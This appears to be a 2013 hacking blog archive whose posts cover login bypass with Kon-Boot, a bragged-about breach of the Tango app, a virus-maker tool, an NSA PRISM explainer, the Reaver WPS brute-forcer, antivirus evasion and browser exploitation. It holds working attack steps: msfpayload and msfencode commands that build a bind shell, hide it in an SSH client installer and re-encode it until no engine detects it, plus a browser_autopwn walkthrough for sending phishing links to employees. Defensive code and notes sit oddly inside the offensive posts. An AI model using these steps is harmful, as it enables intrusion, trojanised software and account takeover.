Saturday, July 20, 2013

Using Kon-Boot from a USB Flash Drive: Bypass those pesky Windows and Linux login passwords completely

Kon-Boot is a cool tool you can download from that boots from a CD or floppy and modifies memory to let you log in without knowing a local account password, in both Windows (even up to Windows 7 32-bit SP1) and Linux (not all distros). Kon-Boot is sort of a boot loader that lets you bypass having to use valid credentials when the OS finishes booting. Unfortunately, CDs are hard to put in your pocket, and many machines don't have floppy drives any more. What I needed was to be able to put Kon-Boot on my pico USB thumbdrive. I found some details online about how to get it on a thumbdrive using the floppy image and Unetbootin, but I had problems with it going into an infinite loop when I tried to use Kon-Boot from a USB flash drive (it worked fine on the same box from a CD). I read some of the comments on Raymond's blog, and someone pointed out the problem but did not really give the file changes to fix it (which I will give below). It seems that when you boot Kon-Boot from a USB device, the USB device becomes hd0, but Kon-Boot then tries to pass the booting process on to hd0 (when the internal drive is most likely hd1 at that point), so you get the infinite loop or a gray screen. I modified syslinux.cfg to get it to work. Here are the steps to get Kon-Boot to work from a USB pen-drive:
1. Write the floppy image (NOT THE ISO YOU INBRED FELCH MONKEY!!!) to a USB flash drive using Unetbootin, as seen in this image.

2. Extract the files in the following zip to the root of your thumbdrive: KonBoot Download

3. Tell your BIOS to boot from a USB drive (F12 on most Dells brings up this boot device menu).

4. When the syslinux menu comes up, choose "1st Kon-Boot" first and step through it.

5. The second time the syslinux menu comes up, choose the option "2nd try boot from drive C: as hd1".

6. If hd1 does not work, try hd2 and so forth until you get in. If you have a multi-boot system you may get a boot error, but it still worked for me after I confirmed past it.

7. On Linux, log in as kon-usr at the terminal (not GDM/KDM/XDM). On Windows, use any valid local user name and a blank password (or even gibberish; anything you type in as a password seems to work).
Thanks to the All guys for letting me know about Kon-Boot.

Friday, July 19, 2013

Tango App website/databases hacked


The Syrian Electronic Army hacked the Tango app (video/text messaging service) website and database.
The databases contain millions of the app's users' phone numbers, contacts and email addresses.
More than 1.5 TB of the daily backups of the server network was downloaded successfully.
Screenshot of the backups folder of the servers network of Tango App:

Screenshot of the Tango App log :

Screenshot shows the backup folder size :

Much of the information in the databases that were downloaded will be delivered to the Syrian government

How To Create Virus Without Any Programming Knowledge


Tool Name:- Sonic Bat Batch File Virus Maker

This program creates batch (.bat) viruses and has various options to ruin the victim's computer in different ways. It can flood the storage space on the victim's computer by creating a large number of files in different folders with its "folder flood" feature. It also includes a bat-to-exe converter to turn your batch virus files into exe virus programs, and an icon changer. Try it and enjoy…
If you face any trouble, please comment below; your queries are valuable to us.

Thursday, July 18, 2013

Everything you need to know about PRISM

A cheat sheet for the NSA's unprecedented surveillance programs.

By T.C. Sottek and Josh Kopstein

Since September 11th, 2001, the United States government has dramatically increased the ability of its intelligence agencies to collect and investigate information on both foreign subjects and US citizens. Some of these surveillance programs, including a secret program called PRISM, capture the private data of citizens who are not suspected of any connection to terrorism or any wrongdoing.
In June, a private contractor working for Booz Allen Hamilton leaked classified presentation slides that detailed the existence and the operations of PRISM: a mechanism that allows the government to collect user data from companies like Microsoft, Google, Apple, Yahoo, and others. While much of the program — and the rest of the NSA’s surveillance efforts — are still shrouded in secrecy, more details are coming to light as the public, as well as its advocates and representatives, pressure the government to come clean about domestic spying.

The what

What the hell is PRISM? PRISM is a tool used by the US National Security Agency (NSA) to collect private electronic data belonging to users of major internet services like Gmail, Facebook, Outlook, and others. It’s the latest evolution of the US government’s post-9/11 electronic surveillance efforts, which began under President Bush with the Patriot Act, and expanded to include the Foreign Intelligence Surveillance Act (FISA) enacted in 2006 and 2007.
There’s a lot we still don’t know about how PRISM works, but the basic idea is that it allows the NSA to request data on specific people from major technology companies like Google, Yahoo, Facebook, Microsoft, Apple, and others. The US government insists that it is only allowed to collect data when given permission by the secretive Foreign Intelligence Surveillance Court.

Why is PRISM a big deal?

Classified presentation slides detailing aspects of PRISM were leaked by a former NSA contractor. On June 6th, The Guardian and The Washington Post published reports based on the leaked slides, which state that the NSA has “direct access” to the servers of Google, Facebook, and others. In the days since the leak, the implicated companies have vehemently denied knowledge of and participation in PRISM, and have rejected allegations that the US government is able to directly tap into their users' data.
Both the companies and the government insist that data is only collected with court approval and for specific targets. As The Washington Post reported, PRISM is said to merely be a streamlined system — varying between companies — that allows them to expedite court-approved data collection requests. Because there are few technical details about how PRISM operates, and because of the fact that the FISA court operates in secret, critics are concerned about the extent of the program and whether it violates the constitutional rights of US citizens.

How was PRISM created?

As The Washington Post reported, The Protect America Act of 2007 led to the creation of a secret NSA program called US-984XN — also known as PRISM. The program is said to be a streamlined version of the same surveillance practices that the US was conducting in the years following 9/11, under President George W. Bush’s “Terrorist Surveillance Program.”
The Protect America Act allows the attorney general and the director of national intelligence to explain in a classified document how the US will collect intelligence on foreigners overseas each year, but does not require specific targets or places to be named. As the Post reports, once the plan is approved by a federal judge in a secret order, the NSA can require companies like Google and Facebook to send data to the government, as long as the requests meet the classified plan's criteria.

Who is responsible for leaking PRISM?

Edward Snowden, a 29-year-old intelligence contractor formerly employed by the NSA, CIA, and Booz Allen Hamilton, confessed responsibility for leaking the PRISM documents. He revealed himself on June 9th, three days after reports on PRISM were published; in an interview with The Guardian, Snowden said, “I don’t want to live in a society that does these sort of things,” and claimed he was motivated by civic duty to leak classified information.
Snowden left the United States prior to leaking the documents in order to avoid capture, taking refuge in Hong Kong — where he stayed until June 23rd. With the assistance of WikiLeaks, Snowden fled Hong Kong for Moscow, and has requested asylum in Ecuador, Russia, and other countries. He is still residing in a Moscow airport, waiting to be granted asylum.

What does the NSA collect?

While PRISM has been the most talked-about story to come out of Snowden’s leaks, the disclosures have shed light on a vast array of NSA surveillance programs. Broadly speaking, these can be split into two categories: “upstream” wiretaps, which pull data directly from undersea telecommunications cables, and efforts like PRISM, which acquire communications from US service providers. One of the slides in the leaked PRISM presentation instructs that analysts “should use both” of these sources.
NSA programs collect two kinds of data: metadata and content. Metadata is the sensitive byproduct of communications, such as phone records that reveal the participants, times, and durations of calls; the communications collected by PRISM include the contents of emails, chats, VoIP calls, cloud-stored files, and more. US officials have tried to allay fears about the NSA’s indiscriminate metadata collection by pointing out that it doesn’t reveal the contents of conversations. But metadata can be just as revealing as content — internet metadata includes information such as email logs, geolocation data (IP addresses), and web search histories. Because of a decades-old law, metadata is also far less well-protected than content in the US.
A leaked court order provided by Snowden showed that Verizon is handing over the calling records and telephony metadata of all its customers to the NSA on an “ongoing, daily basis.” Mass collection of internet metadata began under a Bush-era program called "Stellarwind," which was first revealed by NSA whistleblower William Binney. The program was continued for two years under the Obama administration, but has since been discontinued and replaced with a host of similar programs with names like “EvilOlive” and “ShellTrumpet.”

How does the NSA collect data?

Many crucial details on how and under what circumstances the NSA collects data are still missing. Legally speaking, surveillance programs rely on two key statutes, Section 702 of the FISA Amendments Act (FAA) and Section 215 of the Patriot Act. The former authorizes the collection of communications content under PRISM and other programs, while the latter authorizes the collection of metadata from phone companies such as Verizon and AT&T. However, multiple reports and leaked documents indicate the statutes have been interpreted in secret by the FISA intelligence courts to grant much broader authority than they were originally written to allow. They also indicate that the FISA courts only approve the NSA’s collection procedures, and individual warrants for specific targets are not required.
An analyst starts by inputting “selectors” (search terms) into a system like PRISM, which then “tasks” information from other collection sites, known as SIGADs (Signals Intelligence Activity Designators). SIGADs have both classified and unclassified code names, and are tasked for different types of data — one called NUCLEON gathers the contents of phone conversations, while others like MARINA store internet metadata.
Leaked documents show that under the agency’s targeting and “minimization” rules, NSA analysts cannot specifically target someone “reasonably believed” to be a US person communicating on US soil. According to The Washington Post, an analyst must have at least “51 percent” certainty their target is foreign. But even then, the NSA’s “contact chaining” practices — whereby an analyst collects records on a target’s contacts, and their contacts’ contacts — can easily cause innocent parties to be caught up in the process.
The rules state the analyst must take steps to remove data that is determined to be from “US persons,” but even if they are not relevant to terrorism or national security, these “inadvertently acquired” communications can still be retained and analyzed for up to five years — and even given to the FBI or CIA — under a broad set of circumstances. Those include communications that are "reasonably believed to contain evidence of a crime that has been, is being, or is about to be committed," or that contain information relevant to arms proliferation or cybersecurity. If communications are encrypted, they can be kept indefinitely.

So, what now?

In the weeks since the PRISM documents leaked, a widespread international public debate about the United States government’s surveillance and spying programs has engulfed the NSA, Congress, and the Obama administration in controversy. While outspoken supporters of NSA surveillance in Congress and the White House —including President Obama — have defended the legality and necessity of the programs, some US lawmakers are pushing back. In June, a bipartisan group of senators unveiled a bill that aims to rein in the problematic legal provisions that give US intelligence agencies nearly unfettered authority to conduct warrantless surveillance on domestic and foreign communications. Several other lawmakers have introduced their own measures, but legislative reform is still in early stages.


Meanwhile, a diverse coalition of interest groups and private organizations are directly challenging some of the NSA’s surveillance programs in court. On July 16th, a broad coalition of plaintiffs sued the US government for “an illegal and unconstitutional program of dragnet electronic surveillance,” in which the NSA scoops up all telephone records handled by Verizon, AT&T, and Sprint in the US. Separate suits brought by the Electronic Privacy Information Center and the American Civil Liberties Union are also in the works, but the government hasn’t responded to the allegations in court yet.
The companies at the heart of PRISM’s controversy are also acting out, but the specific details regarding their involvement in government surveillance on US citizens is still unclear. Microsoft, Google, Yahoo, and others have stepped up pressure on the government in the past month to declassify the process which compels them to hand over user data to the government. In an impassioned plea made by Microsoft on July 16th, the company’s general counsel Brad Smith said: “We believe the US constitution guarantees our freedom to share more information with the public, yet the government is stopping us.”
Finally, there’s the group of people most affected by PRISM and its sibling programs: the American public. On July 4th, “Restore the Fourth” rallies in more than 100 US cities protested the government’s surveillance programs, focusing on electronic privacy. It’s not clear if public outrage will result in reform, but thanks to the dramatic actions of a young intelligence contractor, we now at least have the opportunity to discuss what the US government has been hiding from the public in the name of national security.
Source: The Verge

Tuesday, July 16, 2013

Reaver 1.4 - Wifi Protected Setup (WPS) Brute Forcer


An Austrian information security student and researcher, Stefan Viehböck, released details of a vulnerability in the WiFi Protected Setup (WPS) standard that enables attackers to recover the router's PIN, and a security firm has published an open-source tool capable of exploiting the vulnerability. The tool, known as Reaver, can find the WPS PIN of a given router and then recover the router's WPA passphrase as well. Now we have the next version, Reaver 1.4.
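Why the PIN falls so quickly, as an added illustration that is not part of the Reaver release notes: the eighth PIN digit is a checksum of the first seven (the algorithm below follows the WSC specification), and the access point confirms each half of the PIN separately during the exchange, so the worst case drops from 10^8 candidates to 11,000. The PINs used here are constructed sample values.

```python
def wps_pin_checksum(first_seven: int) -> int:
    """Checksum digit that the WSC specification appends to a 7-digit PIN body."""
    accum, pin = 0, first_seven
    while pin:
        accum += 3 * (pin % 10)   # odd positions (from the right) weighted 3
        pin //= 10
        accum += pin % 10         # even positions weighted 1
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the checksum of the first seven."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])


def wps_search_space() -> tuple:
    """Worst-case number of guesses under three models of the PIN exchange."""
    naive = 10 ** 8              # eight independent digits
    with_checksum = 10 ** 7      # the last digit is derived, not free
    # The AP's replies after messages M4 and M6 reveal whether each half of the
    # PIN was right: 4 free digits in the first half, then 3 free digits plus
    # the derived checksum in the second half. The halves are attacked in turn.
    split_halves = 10 ** 4 + 10 ** 3
    return naive, with_checksum, split_halves


if __name__ == "__main__":
    # Constructed sample: the well-known default-style PIN 12345670 is well formed.
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    print("12345671 valid:", is_valid_wps_pin("12345671"))
    print("guesses (naive, checksum, split):", wps_search_space())
```

The split verification, not the checksum, is what makes a PIN recoverable in hours; the corresponding mitigation on the access point is to disable WPS PIN (external registrar) authentication or enforce a lockout after a few failed attempts.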
List Of Changes In Reaver 1.4:

1. Updated reaver and wash usage, reverted last wash update (unnecessary).
2. Wash now processes data even if received on the wrong channel.
3. Added BSSID to session restore prompt.
4. Fixed wash pcap parsing bug.
5. Updated exchange.c to time out properly if --no-nacks is specified.
6. Added --no-nacks option for APs that repeatedly send multiple WPS response packets.
7. Added --exec option to run a specified command upon successful completion.
8. Fixed --session bug.
9. Added RSSI output to wash.
10. Fixed makefile bug.
11. Fixed bug in pins.c introduced in r95. Pins no longer randomized.
12. Added sanity checks for out of order packets to message processing in exchange.c.
13. Fixed null pointer reference bug.
14. Reverted association supported and extended rates to original values.
15. Re-work of the message processing functions, primarily in exchange.c.
16. Added -p option to mkdir in makefile.
17. Added sanity checks to ensure that WPS messages are sent in the proper order.
18. Fixed arg parsing bug.
18. Updated Makefile, changed ‘walsh’ to ‘wash’. Added wash documentation.
19. Fixed bug in auto-detection of WSC_NACK support.
20. Fixed channel hopping bug. Now WSC_NACKs are always sent to ensure WPS session termination.
21. Supported rates in association packets now reflect the supported rates in the AP’s beacon packets. AP beacons are now always parsed prior to reassociation to ensure we are still on the right channel.
22. Fixed database permissions bug in Reaver Makefile.
23. Fixed walsh channel bug. Added sanity checks in exchange.c before setting progress status to KEY2_DONE.
24. Fixed overflow in parse_beacon_tags.
25. Fixed logic bug where SEND_M2D status was interpreted as a RECV_DONE status.
26. Fixed memory leaks.
27. Fixed bug in generating proper WPS messages (resulted in false negatives). Added verbose message status output.
28. wpsmon char c => int c.
29. Documentation updates.
30. Fixed Makefile bug.
31. Fixed session saved output bug.
32. Updated session.c to always print restore session prompt to stderr.
33. Updated Makefile, configure script and #defines to ensure that --prefix is honored.
34. Fixed makefile not properly installing to specified prefix.
35. Removed dev debug flag.
36. Enabled debug output for troubleshooting issues; don’t use unless you want lots of debug output (this will be made a command line option in the near future…).
37. Updated walsh WPS lock status display. Fixed file permission bug in Makefile. Removed old code in libwps/.
38. Updated walsh to display more useful info. Removed adaptive delay feature.
39. Added adaptive lockout sleep times, added -ldl to LDFLAGS.

For Additional Information & To Download Reaver Click Here

Bypass and Crypt Payload from Antivirus


Bypassing Antivirus with Msfencode (10 pts.)

What You Need

  • A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.


We are using some harmless test files, but don’t infect people with any real viruses–that’s a crime!


Antivirus protects machines from malware, but not from all of it. There are ways to pack malware to make it harder to detect. We’ll use Metasploit to render malware completely invisible to antivirus.

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine. It is not a virus, and won’t spread, but it is detected by antivirus engines.
In BackTrack, in a Terminal window, execute these commands:
cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file, as shown below:

Analyzing the Listener with VirusTotal

In BackTrack, click Applications, Internet, “Firefox Web Browser“.
In Firefox, go to
Click the “Choose File” button. Navigate to /root and double-click the listen.exe
“listen.exe” appears in the “Choose File” box, as shown below:

In the VirusTotal web page, click the “Scan It!” button.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that many of the antivirus engines detected the file–33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Saving the Screen Image

Make sure the result is visible, showing something like “Detection rate: 33/42“, as shown above.
Save a screen capture with a filename of “Proj 6xa from YOUR NAME“.

Encoding the Listener

This process will encode the listener, and insert it into an innocent SSH file.
In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
You should see the evil_ssh.exe file, as shown below:

Analyzing the Encoded Listener with VirusTotal

In Firefox, go to
Click the “Choose File” button. Navigate to /root and double-click the evil_ssh.exe file.
In the VirusTotal web page, click the “Scan It!” button.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that fewer of the antivirus engines detect the file now–21 out of 42, when I did it, as shown below. You may see different numbers.

Encoding the Listener Again

This process will encode the listener with several different encodings, as recommended by Keith Burton (Thanks!).

In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
You should see several files, as shown below:

Analyzing the Encoded Listener with VirusTotal

In Firefox, go to
Click the “Choose File” button. Navigate to /root and double-click the listen5.exe file.
In the VirusTotal web page, click the “Scan It!” button.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that fewer of the antivirus engines detect the file now–0 out of 42, when I did it, as shown below. You may see different numbers.

Saving the Screen Image

Make sure the result is visible, showing a lower detection rate, like “Detection rate: 0/42“, as shown above.
Save a screen capture with a filename of “Proj 6xb from YOUR NAME“.
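A defender's view of the same experiment, as an added example that is not part of the original class project: each encoding pass turns the payload into a near-uniform byte blob, so a minimal PE section-table parser plus a Shannon-entropy check flags sections that look encoded or packed even when no signature matches. The PE images it analyses are constructed inline for the test, and the 7.0 bits/byte threshold is an assumed triage heuristic, not a figure from the page.

```python
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for uniformly spread bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n, ent = len(data), 0.0
    for c in counts:
        if c:
            p = c / n
            ent -= p * math.log2(p)
    return ent


def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for every section of a PE image (minimal header parse)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]            # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]     # SizeOfOptionalHeader
    table = coff + 20 + opt_size                                 # first section header
    for i in range(num_sections):
        hdr = image[table + 40 * i:table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)   # SizeOfRawData, PointerToRawData
        yield name, image[raw_ptr:raw_ptr + raw_size]


def suspicious_sections(image: bytes, threshold: float = 7.0):
    """Return [(name, entropy)] for sections above the (assumed) entropy threshold."""
    hits = []
    for name, data in pe_sections(image):
        ent = shannon_entropy(data)
        if ent > threshold:
            hits.append((name, round(ent, 2)))
    return hits


def build_test_pe(sections):
    """Construct a minimal PE image for testing (constructed input, not a real binary)."""
    pe_off = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)  # no optional header
    ptr = pe_off + 4 + 20 + 40 * len(sections)                   # raw data follows the table
    headers, bodies = b"", b""
    for name, data in sections:
        headers += name.ljust(8, b"\0") + struct.pack("<IIII", len(data), 0x1000, len(data), ptr)
        headers += b"\0" * 16                                    # relocs, line numbers, flags
        bodies += data
        ptr += len(data)
    return dos + b"PE\0\0" + coff + headers + bodies


# Constructed samples: a "clean" image (NOP sled plus text) and one whose .text
# section is a uniform byte spread, which is what an encoded payload looks like.
SAMPLE_PLAIN = build_test_pe([(b".text", b"\x90" * 512), (b".data", b"hello world " * 40)])
SAMPLE_ENCODED = build_test_pe([(b".text", bytes(range(256)) * 2)])

if __name__ == "__main__":
    for label, img in (("plain", SAMPLE_PLAIN), ("encoded", SAMPLE_ENCODED)):
        print(label, suspicious_sections(img))
```

Entropy is a triage signal rather than a verdict (legitimately compressed resources also score high), so treat hits as candidates for sandboxing or manual analysis.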

Monday, July 15, 2013

Metasploit Browser Autopwn

Nowadays, due to firewall restrictions and patch management policies, exploitation of systems has become much more difficult. However, one of the most efficient ways in is the use of client-side attacks. Client-side attacks require user interaction and in most cases are used through social engineering engagements. An employee who does not have the necessary knowledge to understand the risks of opening untrusted links can help an attacker exploit internal systems. The fact that browsers are not patched as often as operating systems makes the problem bigger.
In this article we will examine the effectiveness of the Metasploit browser_autopwn module. The basic idea behind that module is that it creates a web server on our local machine which contains different kinds of browser exploits. When the user opens the malicious link, the exploits are run against the user's browser, and if one of them succeeds a Meterpreter session will open.
In order to use this attack we have to open the Metasploit framework and use the browser_autopwn module. In the next image you can see the available options and default settings for this module.
Options of browser autopwn module
We will set LHOST to our IP address, SRVPORT to port 80 (otherwise the link that we have to send to the user must be in the format IP:8080) and URIPATH to / in order to prevent Metasploit from setting up random URLs.

Configuring the Browser Autopwn

After the execution of this module we will notice that different exploits for a variety of browsers start loading onto our web server.

Loading the browser exploits

Now we can share the link by email with our client's employees. If any user opens the malicious link, the autopwn module will try all of these exploits to see if it can break into the client. If the browser is vulnerable to any of these exploits, Meterpreter sessions will open.

Meterpreter sessions opened with Browser Autopwn

Browser-based attacks are not stable. This is because browsers can crash, which means that the Meterpreter session or the shell access will be lost. For that reason Metasploit will try to migrate to another, more stable process as soon as possible.

Migrate to another process

Most organizations are behind proxy firewalls, so only port 80 is allowed. On the other hand, many employees use social networks these days for various reasons. An attacker can exploit that and send malicious links to users through social networks, so this attack can be very effective against companies, as it contains exploits for most of the popular browsers and only requires the mistake of one person in order to be successful. The Metasploit Browser Autopwn module is proof of how dangerous it is to open links that come from untrusted sources.